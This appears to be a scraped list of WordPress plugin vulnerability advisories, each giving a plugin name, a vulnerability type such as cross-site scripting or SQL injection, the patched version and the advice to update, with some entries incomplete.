Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Pseudorandom Number Generation
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Lets-Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.3
Recommended Action: Update to version 1.15.3, or a newer patched version

Plugin: Smart WooCommerce Search

Vulnerability: Missing Authorization
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WP Symposium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 15.9
Recommended Action: Update to version 15.9, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: SQL Injection
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: WA Form Builder

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 21.4
Recommended Action: Update to version 21.4, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: Simple SEO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.92
Recommended Action: Update to version 1.7.92, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: DMCA WaterMarker

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Cross-Site Request Forgery to Local File Inclusion
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 19.9.7
Recommended Action: Update to version 19.9.7, or a newer patched version

Plugin: Contact Form 7 – Dynamic Text Extension

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Redirect 404 Error Page to Homepage or Custom Page with Logs

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Formilla Edge Targeted Messaging Platform for Sales and Marketing

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaPluginID’
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in migrateProductOnlyToCommon function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Frontend Uploader

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Open Graph Metabox

Plugin: WP smart CRM & Invoices FREE

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via datef
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Authenticated SQL Injection
Patched Version: 7.0.3
Recommended Action: Update to version 7.0.3, or a newer patched version

Plugin: User Activity

Vulnerability: IP Address Spoofing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: BuddyPress

Vulnerability: 2.7.3
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Weberino Timed Quiz

Plugin: Quote-O-Matic

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: WP Roles at Registration

Plugin: Smooth Page Scroll Up/Down Buttons

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: MAZ Loader – Preloader Builder for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Mobile Detector

Vulnerability: Arbitrary File Upload
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Orders Tracking for WooCommerce

Vulnerability: Authenticated (Administrator+) Directory Traversal via ‘file_url’
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Clever Addons for Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: CAOS | Host Google Analytics Locally

Vulnerability: Admin+ Arbitrary Folder Deletion via Path Traversal
Patched Version: 4.1.9
Recommended Action: Update to version 4.1.9, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Arbitrary File Deletion
Patched Version: 21.8
Recommended Action: Update to version 21.8, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Posts in Page

Vulnerability: Authenticated Directory Traversal leading to Local File Inclusion
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: optinfirex

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Insecure Direct Object Reference to (Subscriber+) Ticket Export
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 20190426
Recommended Action: Update to version 20190426, or a newer patched version

Plugin: SoundPress Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Missing Authorization
Patched Version: 2.3.17
Recommended Action: Update to version 2.3.17, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via RCCWP_CreateCustomFieldPage.php custom-field-css parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Manage Notification E-mails

Vulnerability: Cross-Site Request Forgery to Plugin Options Update
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Post Grid Blocks <= 3.0.5
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.66
Recommended Action: Update to version 1.1.66, or a newer patched version

Plugin: Image Source Control Lite – Show Image Credits and Captions

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Bing Map Pro

Vulnerability: Cross-Site Request Forgery via AJAX actions
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: W4 Post List

Vulnerability: Information Disclosure via post_excerpt
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Export All URLs

Vulnerability: Cross-Site Request Forgery to Sensitive Data Export
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated SQL Injection via qc_wpbo_search_response
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting via begin_date, end_date, or form_id Parameter
Patched Version: 3.3.18
Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 4.9.4
Recommended Action: Update to version 4.9.4, or a newer patched version

Plugin: WP FuneralPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Gantry 4 Framework

Vulnerability: Remote Code Execution
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: WPcalc – create any online calculators

Plugin: FoxyShop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: Cross-Site Request Forgery via aDBc_save_settings_callback
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Leads and Visitor Insights

Vulnerability: Unauthenticated Arbitrary License Change
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Login as User or Customer

Plugin: HT Politic – For Political WordPress Themes / Website

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Reflected Cross-Site Scripting via ‘message’
Patched Version: 2.1.0.13
Recommended Action: Update to version 2.1.0.13, or a newer patched version

Plugin: QR Twitter Widget

Plugin: About Author Box

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.5.23
Recommended Action: Update to version 1.5.23, or a newer patched version

Plugin: WP Custom Pages

Plugin: JVM WooCommerce Wishlist

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Limited Privilege Escalation via ‘acceptable_defined_roles’
Patched Version: 4.13.2
Recommended Action: Update to version 4.13.2, or a newer patched version

Plugin: MSMC – Redirect After Comment

Plugin: Grid Kit Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 6.4.3
Recommended Action: Update to version 6.4.3, or a newer patched version

Plugin: User Access Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: No subtitle
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: Contact Form by Supsystic

Vulnerability: Reflected Cross-Site scripting
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: FluentAuth – The Ultimate Authorization & Security Plugin for WordPress

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: BigContact Contact Page

Vulnerability: Authenticated SQL Injection
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Redux Framework

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 4.2.13
Recommended Action: Update to version 4.2.13, or a newer patched version

Plugin: Stockists Manager for Woocommerce

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress <= 5.3
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Float menu – awesome floating side menu

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated(Contributor+) Arbitrary File Upload to Remote Code Execution via Template Import
Patched Version: 3.18.2
Recommended Action: Update to version 3.18.2, or a newer patched version

Plugin: Post List With Featured Image

Plugin: Stylish Cost Calculator

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: Smart Email Alerts

Plugin: WP Affiliate Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Art Decoration Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Unauthenticated information disclosure
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Mail Masta

Plugin: Multi-page Toolkit

Plugin: Download Shortcode

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: CoolClock – a Javascript Analog Clock

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: Slideshow, Image Slider by 2J

Plugin: Ultimate WordPress Auction Plugin

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Guest posting / Frontend Posting wordpress plugin – WP Front User Submit / Front Editor

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: WooCommerce Advanced Bulk Edit Products, Orders, Coupons, Any WordPress Post Type – Smart Manager

Vulnerability: WooCommerce Advanced Bulk Edit, Inventory Management & more… <= 8.27.0
Patched Version: 8.28.0
Recommended Action: Update to version 8.28.0, or a newer patched version

Plugin: MainWP Rocket Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Favorites

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Homepage Product Organizer for WooCommerce

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated SQL injection via shortcode
Patched Version: 7.1.12
Recommended Action: Update to version 7.1.12, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthorized Access to Information Disclosure
Patched Version: 1.5.14
Recommended Action: Update to version 1.5.14, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Cross-Site Request Forgery
Patched Version: 220502
Recommended Action: Update to version 220502, or a newer patched version

Plugin: WP-Ban

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.69.1
Recommended Action: Update to version 1.69.1, or a newer patched version

Plugin: Events Rich Snippets for Google

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PostmagThemes Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WP Full Auto Tags Manager

Plugin: Chat Bee

Plugin: Api2Cart Bridge Connector

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WP Job Board

Vulnerability: SQL Injection
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: GraceMedia Media Player

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Cross-Site Request Forgery via process_data
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.17
Recommended Action: Update to version 2.7.17, or a newer patched version

Plugin: Sermon'e – Sermons Online

Plugin: WP Snap App

Plugin: WooCommerce Dynamic Pricing and Discounts

Vulnerability: Unauthenticated Settings Import/Export
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.7
Recommended Action: Update to version 8.0.7, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.7.1
Recommended Action: Update to version 6.7.1, or a newer patched version

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: NextGen Cu3er Gallery

Vulnerability: Multiple Full Path Disclosures
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.8.9.1
Recommended Action: Update to version 3.8.9.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.1.14
Recommended Action: Update to version 8.1.14, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.88.1
Recommended Action: Update to version 2.88.1, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.9.16
Recommended Action: Update to version 6.9.16, or a newer patched version

Plugin: WC Fields Factory

Vulnerability: Authenticated(Subscriber+) SQL Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Admin Pack by SITE CASEIRO

Plugin: Social LikeBox & Feed

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting
Patched Version: 1.22
Recommended Action: Update to version 1.22, or a newer patched version

Plugin: Blog-in-Blog

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Injection Guard

Vulnerability: Missing Authorization via ig_update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: W-DALIL

Plugin: Calculated Fields Form

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Countdown Widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.9.3
Recommended Action: Update to version 3.1.9.3, or a newer patched version

Plugin: RLSWordPressSearch

Plugin: WP Ultimate Recipe

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.12.7
Recommended Action: Update to version 3.12.7, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Request Forgery via tptn_ajax_clearcache
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Community Lite Video Chat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms

Vulnerability: Open Redirect
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Holidays Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Mail Logging

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Slider – Ultimate Responsive Image Slider

Vulnerability: Missing Authorization via AJAX action
Patched Version: 3.5.12
Recommended Action: Update to version 3.5.12, or a newer patched version

Plugin: Custom Permalinks

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Unauthenticated SQL Injection via parse_user_filters
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Schema & Structured Data for WP & AMP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Bulk NoIndex & NoFollow Toolkit

Vulnerability: Missing Authorization
Patched Version: 1.51
Recommended Action: Update to version 1.51, or a newer patched version

Plugin: Newsletters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.5.3
Recommended Action: Update to version 4.6.5.3, or a newer patched version

Plugin: Converter for Media – Optimize images | Convert WebP & AVIF

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP User Groups

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.3.9.4
Recommended Action: Update to version 1.3.9.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Path Traversal via Tax Importer
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Open Redirect
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Front End Users

Vulnerability: Missing Authorization to Unauthenticated Registered User Deletion
Patched Version: 3.2.25
Recommended Action: Update to version 3.2.25, or a newer patched version

Plugin: Rich Reviews by Starfish

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.15
Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Missing Authorization
Patched Version: 9.4
Recommended Action: Update to version 9.4, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Missing Authorization to Settings Modification
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Olevmedia Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Opal Estate

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Category Grid View Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Preloader for Website

Vulnerability: Missing Authorization via plwao_register_settings()
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: OG Tags

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Optimize Database after Deleting Revisions

Vulnerability: Cross-Site Request Forgery via ‘odb_csv_download’
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Login with WHMCS

Vulnerability: Authentication Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_activate and cg_deactivate
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Local File Inclusion and PHAR Deserialization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Trade Runner

Vulnerability: Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘action=rp’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Tiles

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Missing Authorization
Patched Version: 6.23.4
Recommended Action: Update to version 6.23.4, or a newer patched version

Plugin: Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent

Vulnerability: Authenticated(Administrator+) CSV Injection
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Redirection

